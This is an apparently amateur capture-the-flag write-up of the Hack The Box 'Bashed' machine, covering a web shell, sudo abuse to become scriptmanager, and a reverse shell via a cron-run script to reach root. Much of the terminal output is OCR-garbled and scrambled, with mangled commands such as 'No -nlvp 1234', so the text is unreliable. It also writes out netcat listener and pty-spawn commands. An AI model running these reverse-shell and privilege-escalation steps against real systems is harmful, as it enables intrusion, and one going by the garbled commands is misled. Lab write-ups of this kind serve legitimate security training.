This is my attempt to Show I solved HTB’ BASHED

JOURNEY TO OSCP Bashed Difficulty: Points : Release: Linux Easy 20 89 Dec 2617 10.10.18.68

 

 

Nmap:

Nikto:

Gobuster:

Look at /dev it leads me to a web shell

data@bashed : ;äiiiiliii

Gaining a Foothold:

bin ;cripts sys usr var vmlinuz VA-data unæ -a Linux 4.4.e.62. wed Jan UTC Ni7 x" 64 x86 64 x86 64 ea.VLinux \ wand-data ; "

So I’m this machine I already have a low privileged shell that allows me to run linux commands on the web server, so I don’t necessarily need to get my own reverse shell.

User.txt:

vmunuz vM$Fdata@hdfiIhed :/# pwd 1/ft/ft$Fdata@Iih3fiIhed :/# cd home : /home# Is arrexel : /home# cd arrexet : /home/arrexel# Is user. txt : /home/arrexel# cat user. txt \ 2c281f318555dbc1b856957c7147bfc1 ww+data

As you can see I have the user.txt file from this low privilege now I need to get root privilege

Root.txt:

Unfortunately, I’m not going to be able to get root from here so I need to get more creative.

I try SUID -l:

tripts tar vnUnu2 cd rmt cd root cd rmt SINO entries for W-data on bashed; Z'tv_reset, User W-data ny run the follwing co—nds on bashed: (scriptmanager : NTAS*: ALL Irma'* data:

This allows this command lists the allowed commands for my user.

The last two lines are particularly interesting because they say that the user I’m running in the context of (www-data) can run as the user script manager without having to provide the user’s password. This might come in handy later on, but I’ll continue to do more enumeration.

Everything in the root directory seems to be owned by root except for the scripts directory which is owned by script manager without a password.

The above command changes the user to script manager.

iiir. III' I I IMI s 593 OJ d :EHy; Şti dil,

Then enter:

No -nlvp 1234 on the attack machine

root@kali: root@kata / Tools/10u10u10n68# -Ivnp 1234 listening on [any 1 1234 root@kati: 4Tools/1Q1( tpqt@hali; æ/Tools/10,1C connect to 14.111 from (UNKNOWN) 10.681 43392 /bin/sh: O: can It access tty; job control turnerU off

Sudo -I -u script manager

13 root run sbin scripts usr vmlinuz $ sudo -l Matching Defaults entries for VMd-data on bashed: env reset, mail badpass, secu r/tocat/sbin\ : /us r/ locat/bin\ : /us r/sbin\ : /usr/bin\ : /sbin\ : /bin\ : / I User weM-data may run the following commands on bashed: (scriptmanager . scriptmanager) NOPASSWD: ALL I $ sudo -i -u scriptmanager lid gid=1001(scriptmanager)

Using Python -c ‘import pty; pty.spawn(“/bin/bash”);’ to escape try

We had to add a reverse shell

Wget it back into the server since the test.py is running a crown job.

pplications Places root@katx:— listening I ermtnator -nvlp 234 on [any] .234

It’s actually nc -nvlp 2345 lol

Applications Places Sill Terminator nc -nvlp 2345 listeniny on [any] 2345 connect to [10.10.14.111 from (UNKNOWN) [10* 52180. /bin/sh: O: can't access tty; job control turned off

And now we have root

ne -nvtp 2345 listening on tanyl 2345 connect to [10.10.14.111 from (UNKNOWN) [10.10.10.681 52180 /bin/sh: O: can it access tty; job controv turned off # pwd /scripts # Is test. py test. txt # cd / # pwd # Is bin boot dev etc home initrd. img lib lib64 lost+found media mne opt proc root run s bin s cripts sys tmp vmlinuz # root pwd. / root root. txt # cat root. txt cc4feafe3a1ß26d402ba1Ø329674a8eZ